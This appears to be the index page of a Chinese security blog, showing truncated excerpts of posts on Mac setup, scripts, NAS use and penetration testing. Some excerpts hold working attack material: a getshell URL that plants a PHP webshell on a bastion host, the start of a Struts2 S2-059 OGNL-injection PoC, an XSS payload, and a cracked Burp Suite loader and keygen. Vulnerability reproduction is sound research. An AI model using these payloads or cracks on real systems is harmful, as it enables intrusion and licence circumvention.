Mac 自动操作 制作程序
Mac 自动操作 icns 图片转换器Burp-Suite汉化及兼容调试Mac air M1 上手及环境配置 我们以 Burp-Suite 为例子 Burp-Suite结构 编写 .shell1java -noverify -javaagent:BurpSuiteLoader.jar -javaagent:BurpSuiteCn.jar -Dfile.encoding=utf-8 -jar bp.jar 但是每次都要终端启动,挺麻烦的 编写 .command1java -noverify -javaagent:BurpSuiteLoader.jar -javaagent:BurpSuiteCn.jar -Dfile.encoding=utf-8 -jar bp.jar 无需后缀1java -noverify -javaagent:BurpSuiteLoader.jar -javaagent:BurpSuiteCn.jar -Dfile.encoding=utf-8 -jar bp.jar 自动操作 .app前提 配置绝对路径 或者设置一个变量,我设置的是my_path 首 ...
Typora 多吉图床
声明 这是我刚写好的文档,欢迎测试 这个文档也是第一次使用,发现什么问题及时提出 gitee 地址 blog 地址 配置 你不会以为不用配置接口就能用了吧???? 请编辑py脚本和typora 程序运行在python3(.9)环境下 需要配置python环境变量 需要配置你的上传URL 新增图片覆盖,需要编辑python脚本 Windows Mac 适配(mac需要指定python的路径,例如 /usr/local/bin/python3 /PATH/typora+dogedoge.py) 使用 先插上一张好看的小姐姐吧! <img src=”https://xrsec.s3.bitiful.net/IMG/20201102142834770005.webp) 哦,蟹壳 <img src=”https://xrsec.s3.bitiful.net/IMG/20201102142926526674.png?fmt=webp&q=48) 哦,suo得斯name <img src=”https://xrsec.s3.bit ...
Mac air M1 上手及环境配置
本文分为两部分,预览 和 配置 文末新增 Mac自动操作 体验🌚外观 🌕应用 推荐一个网站,能快速获得适配M1 的软件列表 URL 当然 我这个截图软件稍微有点卡,淦😅 🌖使用 我已经使用了 3+ 天了,目前感觉还行 别人都在找散热器,我在找暖宝宝 有个问题很烦恼我,低电量不充电,这可咋整 ctrl + 这个按键快折磨死我了😿 我暂时没有使用虚拟机,但是我有这个 年轻人你不讲唔得,我劝你耗子为之😹 配置 目前绝大多数软件都 OK根据哔哩哔哩最新指示,拿到电脑后先更新系统,否则 重装系统的时候容易出问题但是说要在网页上升级,我也没找到具体位置这里推荐简书的文章 解决在 M1 芯片的 Mac 上重新安装系统的报错 🌱配置 基本设置 首先 打开 终端 右键 显示简介 使用Rosetta打开 终端右键退出 重新打开 接着配置 代理 没有代理网络不好安装软件 🪵配置环境变量 我个人有个爱好,喜欢把自己的脚步放在一个文件夹,方便管理 profile1234# README# 请把下面 二行(修改成你的路径) 添加到 /etc/profile 末尾 并 ...
XR-Tools工具收集
如果有其他的工具推荐,请私聊我,或者评论留下工具 目前 Mac & Windows 【LINK】 微信 网易云音乐 QQ 飞书 【BAT】 PATH CobaltStrike Invoke Redtool Xray-Red 【CMS】 网站漏洞源码 CMS Default PassWd CMS 【CODE】 Notepad++ Subilne Text Vscode 【DATA】 BurpSuite 20_12_01 BurpSuite 20_11_03 jre-tools BurpSuite 20_09_02 BurpSuite old Fiddler 迅雷 Xdown 【TOOLS】 FoFa Vip 超级弱口令检查工具 FireFox 插件版 ThinkPhp 寂灭法则 【O-TOOLS】 ShadowsocksR geek 阿里巴巴DNS检测工具 ApkIDE Cracer安全工具包v7 XDown ApkScan-PKI ...
安利群晖
展示 群晖简介群晖是一款NAS 系统 ,目前市面上的NAS系统很多 比如 FreeNas TrueNAS Unraid PVE 等等 据说 群晖是借鉴的 FreeNas 并 改版 目前比较好用的是 DSM 6.2.2 + DS918 群晖能干嘛Docker 命令行改端口是意见非常痛苦的事情 添加环境变量也很痛苦 Docker 换源 还有一些人搞不懂,这个可以将阿里云的镜像加速地址填写进来,也可以参考我的 docker 加速 Synology Driver 因为我有两台 设备需要同步工具,所以我选择单向上传,另外一台设备 选择单向下载 同步 和 备份 比较好用 偶尔存在BUG Cloud Sync 这款工具 可以把文件加密后上传到百度网盘 密码和key千万不能丢 从百度云下载回来的文件需要解密才能打开,可以使用官方的 解密工具进行解密 Virtual Machine Manager这款工具是虚拟机 VMM 但是我的是amd cpu就不介绍了 Web Station 类似于简单的宝塔,但是又不简单,如果你有证书的话可以设置证书 并指定 HTTPS端口 甚至还能安装JAVA G ...
脚本与命令分享
脚本 首先我们专门设置一个用于放变量脚本的位置,比如我喜欢onedriver 我给这个目录一个环境变量 Gits ==> gits.bat / gits.sh1234@echo offchcp 65001setlocal EnableDelayedExpansiongit add . && git commit -m "Use GITS & %date% & Powered By %username%" && git push Cnpm超级好用的npm换源方案,你还在傻傻的安装cnpm吗? 1npm --registry https://registry.npm.taobao.org %* Ciphey1234@echo offchcp 65001cd %APPDATA%\roaming\python\python38\site-packages\ciphey\python3 ciphey.py %* Cerberus123@echo offchcp 65001python ...
烦死了
1/pcweb/home/index 这开发拖出去嘶啦嘶啦的。堪比国防,你们不写bug,等着失业吗? XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way
Burp-Suite汉化及兼容调试
首先欢迎我们的小伙伴 20-12.1已经化身 蓝溯 就不放链接了。。。 结构 jre\ 指定java路劲即可保证无需安装也能愉快使用bp jre-tools bp各种插件 bp各种版本 bp20-11-03 09-01 12-01 或者更老的 bp.vbs 主要是用于启动 中文版 burp suite bp.jar bp的安装包java版 bpCN.jar bp的汉化包,要使用汉化必须带上 bploader.jar bp注册机需要用上的引导器 注册机.vbs 这个无需介绍了吧! 关键代码Burp Suite 汉化 启动 代码 1CreateObject("WScript.Shell").Run "./jre\bin\java.exe -noverify -javaagent:BurpSuiteLoader.jar -javaagent:BurpSuiteCn.jar -Dfile.encoding=utf-8 -jar bp.jar",0 bp.jar 则是指定的启动程序,可以把bp.jar ...
记一次自己博客的渗透
我的博客:xrsec.fun 打码也没用😂 最近一直闲的无聊,然后刚好在配置友链 遂来一波XSS xss-1 评论处存在XSS1<svg/onload = alert(1);> 评论xss钓鱼 xss挂马 xss killadmin xss盗取明文这个就不发了😂 搜索框xss 两个 一个反射 一个存储 顺便分享一个指纹 123"https://github.com/reruin/sharelist"ortitle=“网盘系统” XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of thi ...
溯光搭建及优化
✨关于溯光溯光,英文名“TrackRay”,意为逆光而行,追溯光源。同时致敬安全圈前辈开发的“溯雪”,“流光”。 溯光是一个开源渗透测试框架,框架自身实现了漏洞扫描功能,集成了知名安全工具:Metasploit、Nmap、Sqlmap、AWVS、Burpsuite等。 溯光使用 Java 编写,SpringBoot 作为基础框架,JPA + HSQLDB嵌入式数据库做持久化,Maven 管理依赖,Jython 管理 Python 插件,quartz 做任务调度,freemarker 做视图层,Websocket 实现命令行式插件交互。 ⭐️特点 使用只需要一个浏览器 集成 AWVS、SQLMap、NMap、Metasploit、Burpsuite、Crawlergo、Kunpeng、XRay 等安全工具 内置多个渗透测试辅助插件 方便、开源 ⚡️快速使用docker启动 git clone --depth=1 https://github.com/iSafeBlue/TrackRay.git 或下载 releases 最新版本源码 docker build -t trackra ...
status-s2059_061漏洞复现
status s2-059xss-1首先搭建靶场 12345git clone https://github.com/vulhub/vulhub.gitcd vulhub/struts2/s2-059docker-compose up -d# 建议换源操作网易源是个不错的选择# http://hub-mirror.c.163.com xss-2进入页面,这个页面 上poc(官网的没回显) https://dnslog.io/ 下面IP和dns地址记得修改 123456789101112import requestsurl = "http://127.0.0.1:8080"data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=# ...
本站已开通订阅功能
小站新开通订阅功能,欢迎大家体验。 123456789101112131415161718 .::::. .::::::::. ::::::::::: ..:::::::::::' '::::::::::::' .:::::::::: '::::::::::::::.. ..::::::::::::. ``:::::::::::::::: ::::``:::::::::' .:::. ::::' ':::::' .::::::::. .::::' :::: .:::::::'::::. .:::' ::::: .:::::::::' ...
2020HVV中的漏洞
一、齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835)1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.(未授权无需登录) 2、访问如下链接即可获得getshell,执行成功后,生成PHP一句话马 https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}” ZWNobyAnPD9waHAgQGV2YW 3.getshell访问路径: /var/www/shterm/resources/qrcode/lbj77.php https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086) 据说还是另外一个版本是java的: 12POST /shterm/listener/tui_update.phpa=["t';impo ...
Citrix_XenMobile服务器上的路径遍历
Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常,由于Active Directory集成,它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。 在此类研究中,发现了路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。 CVE-2020-8209 –路径遍历利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。剥削不需要授权。在文件help-sb-download.jsp中标识了易受攻击的代码: 1<% String sbFilePath="/opt/sas/support/"; int length = 0; String sbFileName=(String)request.getParameter("sbFileName"); ServletOutputStream outStream = response.getOutputStream(); response.setHead ...
安全编排与自动化响应平台
安全编排与自动化响应平台 XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way